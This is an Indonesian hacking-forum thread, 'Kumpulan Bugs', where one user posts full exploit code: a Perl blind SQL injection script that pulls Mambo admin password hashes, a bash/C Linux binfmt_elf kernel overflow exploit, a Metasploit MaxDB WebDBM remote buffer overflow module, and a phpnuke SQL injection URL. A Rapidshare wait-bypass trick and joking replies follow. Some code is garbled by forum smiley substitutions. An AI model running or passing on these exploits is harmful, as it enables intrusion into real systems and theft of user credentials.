Kumpulan Bugs

[Digital Cat]

Mambo "user_rating" Parameter Remote SQL Injection Exploit

Advisory : FrSIRT/ADV-2005-0777
Rated as : Moderate Risk

Code: Select all

#!/usr/bin/perl
use IO::Socket;

if ( @ARGV < 3) { &usage; }

$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];

# параметры любой существующей новости
$news_id = 1;
$news_itemid = 1;

$server =~ s!(http:\/\/)!!;

$request = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;
&head;
print "\r\n";
print " [~] SERVER : $server\r\n";
print " [~] PATH : $path\r\n";
print " [~] USER ID : $member_id\r\n";
print " [~] SEARCHING PASSWORD ... [|]";

while(1)
{
if(&found(47,58)==0) { &found(96,103); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]
---------------------------------------------------------------
USER ID : $member_id
HASH : $allchar
---------------------------------------------------------------
};
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr($char);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$sock1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $sock1 ("GET %sindex.php?option=com_content&task=vote&id=%d&Itemid=%d&cid=1
&user_rating=1,rating_count=(SELECT/**/if((ascii(substring((SELECT/**/password/**/FROM/
**/mos_users/**/WHERE/**/id=%d),%d,1)))%s,1145711457,0)),lastip=666/* HTTP/1.0\n
Host: %s\nAccept: */*\nConnection: close\n\n",
$path,$news_id,$news_itemid,$member_id,$s_num,$ccheck,$server);
# пауза между запросами необходимая дабы инфа успела обновиться, поиграйте с
# этим значением если сплоит выдает FAILED
sleep 1;
$sock2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
printf $sock2 ("GET %sindex.php?option=com_content&task=view&id=%d&Itemid=%d&cid=1
HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
$path,$news_id,$news_itemid,$server);

while(<$sock2>)
{
if (/1145711457/) { return 1; }
}

return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}

sub usage()
{
&head;
print q(
USAGE
r57mambo.pl [HOST] [/FOLDER/] [USER_ID]

OPTIONS
HOST - Host where mambo installed
FOLDER - Folder where mambo installed
USER_ID - User ID for brute (default is 62 for admin)
);
exit();
}
sub head()
{
print q(
---------------------------------------------------------------
Mambo <= 4.5.2.1, MySQL => 4.1 sql injection exploit by digital cat
---------------------------------------------------------------
);
}

Terima Kasih.......

[Digital Cat]

Linux Kernel "binfmt_elf" Core Dump Local Buffer Overflow Exploit

Advisory : FrSIRT/ADV-2005-0524
Rated as : Moderate Risk

Code: Select all

Advisory : FrSIRT/ADV-2005-0524
Rated as : Moderate Risk

#!/bin/bash
#
# elfcd.sh
# warning: This code will crash your machine
#
cat <<__EOF__>elfcd1.c
/*
* Linux binfmt_elf core dump buffer overflow
*
* Copyright (c) 2005 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/
// phase 1
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>

#include <sys/time.h>
#include <sys/resource.h>

#include <asm/page.h>


static char *env[10], *argv[4];
static char page[PAGE_SIZE];
static char buf[PAGE_SIZE];


void fatal(const char *msg)
{
if(!errno) {
fprintf(stderr, "\nFATAL: %s\n", msg);
}
else {
printf("\n");
perror(msg);
}
fflush(stdout); fflush(stderr);
_exit(129);
}


int main(int ac, char **av)
{
int esp, i, r;
struct rlimit rl;

__asm__("movl %%esp, %0" : : "m"(esp));
printf("\n

    * %s argv_start=%p argv_end=%p ESP: 0x%x", av[0], av[0],

av[ac-1]+strlen(av[ac-1]), esp);
rl.rlim_cur = RLIM_INFINITY;
rl.rlim_max = RLIM_INFINITY;
r = setrlimit(RLIMIT_CORE, &rl);
if(r) fatal("setrlimit");

memset(env, 0, sizeof(env) );
memset(argv, 0, sizeof(argv) );
memset(page, 'A', sizeof(page) );
page[PAGE_SIZE-1]=0;

// move up env & exec phase 2
if(!strcmp(av[0], "AAAA")) {
printf("\n

    * phase 2, <RET> to crash "); fflush(stdout);

argv[0] = "elfcd2";
argv[1] = page;

// term 0 counts!
memset(buf, 0, sizeof(buf) );
for(i=0; i<789 + 4; i++)
buf = 'C';
argv[2] = buf;
execve(argv[0], argv, env);
_exit(127);
}

// move down env & reexec
for(i=0; i<9; i++)
env = page;

argv[0] = "AAAA";
printf("\n

    * phase 1"); fflush(stdout);

execve(av[0], argv, env);

return 0;
}
__EOF__
cat <<__EOF__>elfcd2.c
// phase 2
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <syscall.h>

#include <sys/syscall.h>

#include <asm/page.h>

#define __NR_sys_read __NR_read
#define __NR_sys_kill __NR_kill
#define __NR_sys_getpid __NR_getpid


char stack[4096 * 6];
static int errno;


inline _syscall3(int, sys_read, int, a, void*, b, int, l);
inline _syscall2(int, sys_kill, int, c, int, a);
inline _syscall0(int, sys_getpid);


// yeah, lets do it
void killme()
{
char c='a';
int pid;

pid = sys_getpid();
for(;Wink {
sys_read(0, &c, 1);
sys_kill(pid, 11);
}
}


// safe stack stub
__asm__(
" nop \n"
"_start: movl \$0xbfff6ffc, %esp \n"
" jmp killme \n"
".global _start \n"
);
__EOF__
cat <<__EOF__>elfcd.ld
OUTPUT_FORMAT("elf32-i386", "elf32-i386",
"elf32-i386")
OUTPUT_ARCH(i386)
ENTRY(_start)
SEARCH_DIR(/lib); SEARCH_DIR(/usr/lib); SEARCH_DIR(/usr/local/lib);
SEARCH_DIR(/usr/i486-suse-linux/lib);

MEMORY
{
ram (rwxali) : ORIGIN = 0xbfff0000, LENGTH = 0x8000
rom (x) : ORIGIN = 0xbfff8000, LENGTH = 0x10000
}

PHDRS
{
headers PT_PHDR PHDRS ;
text PT_LOAD FILEHDR PHDRS ;
fuckme PT_LOAD AT (0xbfff8000) FLAGS (0x00) ;
}

SECTIONS
{

.dupa 0xbfff8000 : AT (0xbfff8000) { LONG(0xdeadbeef); _bstart = . ; . += 0x7000; }
>rom :fuckme

. = 0xbfff0000 + SIZEOF_HEADERS;
.text : { *(.text) } >ram :text
.data : { *(.data) } >ram :text
.bss :
{
*(.dynbss)
*(.bss)
*(.bss.*)
*(.gnu.linkonce.b.*)
*(COMMON)
. = ALIGN(32 / Cool;
} >ram :text

}
__EOF__

# compile & run
echo -n "

    * Compiling..."

gcc -O2 -Wall elfcd1.c -o elfcd1
gcc -O2 -nostdlib elfcd2.c -o elfcd2 -Xlinker -T elfcd.ld -static
./elfcd1

Terima Kasih.......

[Digital Cat]

MySQL MaxDB Webtool "GET" Command Remote Buffer Overflow Exploit
Date : 11/05/2005

Advisory : FrSIRT/ADV-2005-0389
CVE Reference : CAN-2005-0684
Rated as : High Risk

Code: Select all

package Msf::Exploit::maxdb_webdbm_get_overflow;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
{
'Name' => 'MaxDB WebDBM GET Buffer Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' => [ 'H D Moore <hdm [at] metasploit.com>' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,

'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 9999],
},

'Payload' =>
{
'Space' => 2052,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x40",
'Prepend' => "\x81\xc4\x54\xf2\xff\xff", # add esp, -3500
'Keys' => ['+ws2ord'],
},

'Description' => Pex::Text::Freeform(qq{
This module exploits a stack overflow in the MaxDB WebDBM service.
This service is included with many recent versions of the MaxDB and SAPDB
products. This particular module is capable of exploiting Windows systems
through the use of an SEH frame overwrite. The offset to the SEH frame
may change depending on where MaxDB has been installed, this module assumes
a web root path with the same length as:

C:\\Program Files\\sdb\\programs\\web\\Documents
}),

'Refs' =>
[
['URL', 'http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities'],
],

'DefaultTarget' => 0,
'Targets' =>
[
['MaxDB 7.5.00.11 / 7.5.00.24', 0x1002aa19 ], # wapi.dll
['Windows 2000 English', 0x75022ac4 ], # ws2help.dll
['Windows XP English SP0/SP1', 0x71aa32ad ], # ws2help.dll
['Windows 2003 English', 0x7ffc0638 ], # peb magic :-)
['Windows NT 4.0 SP4/SP5/SP6', 0x77681799 ], # ws2help.dll
],

'Keys' => ['maxdb'],
};

sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced},  @_);
return($self);
}

sub Check {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');

my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ( $s->IsError ) {
$self->PrintLine( '

    * Error creating socket: ' . $s->GetError );

return $self->CheckCode('Connect');
}

$s->Send("HEAD / HTTP/1.0\r\n\r\n");
my $res = $s->Recv(-1, 5);
$s->Close;

if ($res =~ m/Server:\s*(SAP-Internet-SapDb-Server.*)$/m) {
my $banner = $1;
$banner =~ s/\r//g;

$self->PrintLine("

    * WebDBM detected: $banner");

return $self->CheckCode('Detected');
}

$self->PrintLine("

    * SAP/MaxDB WebDBM server was not detected");

return $self->CheckCode('Safe');
}


sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

$self->PrintLine( "

    * Attempting to exploit " . $target->
    * );


my $s = Msf::Socket::Tcp->new(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);

if ( $s->IsError ) {
$self->PrintLine( '

    * Error creating socket: ' . $s->GetError );

return;
}

# Trigger the SEH by writing past the end of the page after
# the SEH is already overwritten. This avoids the other smashed
# pointer exceptions and goes straight to the payload.
my $path = Pex::Text::AlphaNumText(16384);

substr($path, 1586, length($shellcode), $shellcode);
substr($path, 3638, 5, "\xe9" . pack('V', -2052));
substr($path, 3643, 2, "\xeb\xf9");
substr($path, 3647, 4, pack('V', $target->[1]));

$s->Send("GET /%$path HTTP/1.0\r\n\r\n");
$s->Recv(-1, 5);
return;
}

1;

Terima Kasih.......

[Digital Cat]

Bug : SQL phpnuke 7.0

Kode by : [email protected]

Code: Select all

Уязвимость найдена в модуле Survey. Удаленный атакующий может внедрить произвольный 
sql-код используя отсутствие фильтрации переменной pollID.
Данная уязвимость может использоваться для получения хешей паролей пользователей портала. 
o-------------------------=[ Contoh ]:::
www.victim.com/php-nuke/modules.php?name=Surveys&pollID=a'[sql_code_here]

Terima Kasih.......

[pLaybOy]

mantap euy yg cia ngga brani buka ah, ntr di kira gw pula yg ngehack

[d1kz]

gokil banyak juga ya

[Digital Cat]

mantap euy yg cia ngga brani buka ah, ntr di kira gw pula yg ngehack

kenapa kamu tidak berani buka..?

buka / lihat saja lagi..

apa kamu mau lihat nama kamu di CIA ?

becanda aja kok...

Terima Kasih.......

[Digital Cat]

Bagi yang sering download dengan Rapidshare pasti busen kalo harus tunggu giliran download,

gunain aja kode ini simpan dengan format bat :

Code: Select all

ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit

java scriptnya seperti ini :

Code: Select all

c(countdown = 0);

sorry coy kalo udah ada yang tau.. key..

thanks..

[shad.hckr]

bug cia nya dah gak bisa kek nya tuh kk.. tapi keren dah postingannya.. Te O Pe Be Ge Te eS Ka eL..